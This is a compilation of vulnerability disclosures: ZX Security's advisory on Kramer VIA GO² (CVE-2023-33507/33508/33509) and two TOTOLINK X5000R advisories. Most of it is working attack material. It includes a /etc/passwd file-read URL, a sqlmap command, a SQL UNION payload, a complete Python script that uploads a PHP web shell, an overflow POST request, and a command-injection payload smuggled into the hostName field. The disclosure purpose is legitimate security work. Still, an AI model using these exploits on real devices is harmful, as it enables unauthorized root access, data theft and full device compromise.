Throughout the disclosure process, Kramer have been exceedingly helpful and responsive. They were quick to confirm the issues and release a patch that fully resolves the issues.

**What is a Kramer VIA GO²?**

> VIA GO² gives iOS, Android, Chromebook, PC, and Mac users instant wireless connectivity with 4K advanced presentation capabilities. Kramer’s new VIA 4.0 is all about the end user. The new VIA application UI is intuitive, user-friendly and much easier to use. VIA 4.0 enables any user, including guests, to easily and securely connect and automatically disconnect at the end of the session.

After finding a device with default credentials (su:supass), it was discovered that it was possible to upload a font with an arbitrary extension and no content restrictions. This meant it was possible to upload a font which is actually a PHP script with the extension .php. Once the path on disk was found, visiting directly in a browser would execute the PHP file and allow a user to perform commands on the underlying operating system. From there, we created a dump of the available web application/PHP source code. The code was protected using IONCube, however this was bypassed using commonly available tools such as easytoyou.eu.

Available handlers were reviewed for issues and the three high severity vulnerabilities were discovered. It is likely that there are more within the codebase, and our audit of the code was in no way exhaustive.

After reviewing the latest firmware for these devices (4.0.1.1326), we noted that the handlers were _not_ included with the Debian package. The file runpkg.sh, which is run as part of the update process, contained the following commands:

    ...
    rm -rf /var/www/html/downloadRecording.php
    rm -rf /var/www/html/downloadMedia.php
    rm -rf /var/www/html/UploadWallpaper.php
    ...
    

This indicates that these endpoints should be removed by a firmware update.

While the firmware itself is password protected, simply by decoding the source code the decryption password was discovered.

**Proofs of concepts****Unauthenticated file read (CVE-2023-33507)**

The following endpoint allowed for the contents of arbitrary files on the file system to be retrieved:

*   http://XXX/downloadRecording.php?file=/etc/passwd

**Unauthenticated SQLi (CVE-2023-33509)**

This could be exploited with the following sqlmap command:

    sqlmap -u 'https://XXX/downloadMedia.php?medId=*' --dbms mysql --risk 3 --level 5 --technique B --threads 10
    

As an added bonus, the contents of arbitrary files could be obtained with the following payload:

*   https://XXX/downloadMedia.php?medId=-1+UNION+SELECT+"/../../../../etc/passwd"

**Unauthenticated RCE via File Upload (CVE-2023-33508)**

This issue can quickly be identified by attempting to access the endpoint:

*   http://XXX/UploadWallpaper.php

If this handler returns the message “Please enter the image to upload” it is very likely to be vulnerable.

The following Python payload can be used to obtain RCE:

    import requests
    import sys
    from urllib3.exceptions import InsecureRequestWarning
    
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    
    SHELL = '<html><head><title>babyshell</title></head><body><pre><?php echo $_REQUEST["cmd"]; ?></pre><br/><pre><?php echo system($_REQUEST["cmd"]); ?></pre></body></html>'
    
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target.com|1.2.3.4>")
        exit(1)
    
    target = sys.argv[1]
    
    url = f'https://{target}/UploadWallpaper.php'
    
    print("Uploading shell")
    
    resp = requests.post(url, files={'data': ('zx.php', SHELL)}, verify=False)
    
    if "Image added sucessfull" not in resp.text:
        print("Shell failed to upload")
        exit(1)
    
    print("Shell uploaded. Checking shell")
    
    url = f"https://{target}/uploads/large/zx.php"
    resp = requests.get(url, verify=False)
    if "Minishell" not in resp.text:
        print("Shell failed")
        exit(1)
    
    print("Shell available at:", url)
    

**Potential Impact**

Complete device compromise is possible, either via the RCE or obtaining user passwords via the Squeely.

**How to Fix It**

First update to version 4.0, then apply version 4.0.1.1326 or later.

**Vulnerability Disclosure Timeline:**

*   21/02/2023 Disclosed issue to CERT NZ
*   09/03/2023 Response from Vendor
*   17/03/2023 Vendor released patched firmware to ZX. ZX identified that the patch removes the vulnerable endpoints.
*   31/05/2023 CVEs assigned

CVE-2023-33507: Kramer VIA GO² - ZX Security

TOTOLINK X5000R V9.1.0u.6118_B20201102 and V9.1.0u.6369_B20230113 contains a post-authentication buffer overflow via parameter sPort/ePort in the addEffect function.

**Firmware has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.totolink.net/
*   Firmware download address ：https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/218/ids/36.html
*   Version ：TOTOLINK X5000R V9.1.0u.6118\_B20201102、TOTOLINK X5000R V9.1.0u.6369\_B20230113

**Product Information**

**Analyse**

Note that the value of addEffect needs to be changed to 1, otherwise the subsequent overflow cannot be triggered.

The sprintf function did not check the length of the data, leading to an overflow.

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.3.2
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/111.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 578
    Origin: http://192.168.3.2
    Connection: closec
    Referer: http://192.168.3.2/advance/ipf.html?time=1679385965794
    Cookie: SESSION_ID=2:1679385944:2c
    
    {"enable":"1","addEffect":"1","topicurl":"setIpPortFilterRules","sPort":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
    

As shown in the figure above, we can hijack PC registers.

Finally, you can write exp to get a stable root shell without authorization.

CVE-2023-33485: vuln/TOTOLINK/X5000R/5 at main · Kazamayc/vuln

TOTOLINK X5000R V9.1.0u.6118_B20201102 and V9.1.0u.6369_B20230113 contain a command insertion vulnerability in setOpModeCfg. This vulnerability allows an attacker to execute arbitrary commands through the "hostName" parameter.

**Firmware Has an command injection vulnerability****Overview**

*   Manufacturer's website information：https://www.totolink.net/
*   Firmware download address ：https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/218/ids/36.html
*   Version ：TOTOLINK X5000R V9.1.0u.6118\_B20201102、TOTOLINK X5000R V9.1.0u.6369\_B20230113

**Product Information**

**Analyse**

TOTOLINK X5000R (V9.1.0u.6118\_B20201102)was found to contain a command insertion vulnerability in setOpModeCfg.This vulnerability allows an attacker to execute arbitrary commands through the "hostName" parameter.

Be careful to set the value of the parameter "proto" to a number other than 3, 4, or 6 when sending a packet, as only the "default" value can trigger our vulnerability.

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.3.2
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 90
    Origin: http://192.168.3.2
    Connection: close
    Referer: http://192.168.3.2/advance/time.html?time=1679126798322
    Cookie: SESSION_ID=2:1679122532:2
    
    
    {
    "proto":"1",
    "hostName":"';echo yichen > /tmp/1.txt;' ",
    "topicurl":"setOpModeCfg"
    }
    

Finally, you can write exp to get a stable root shell without authorization.

Tag

#mac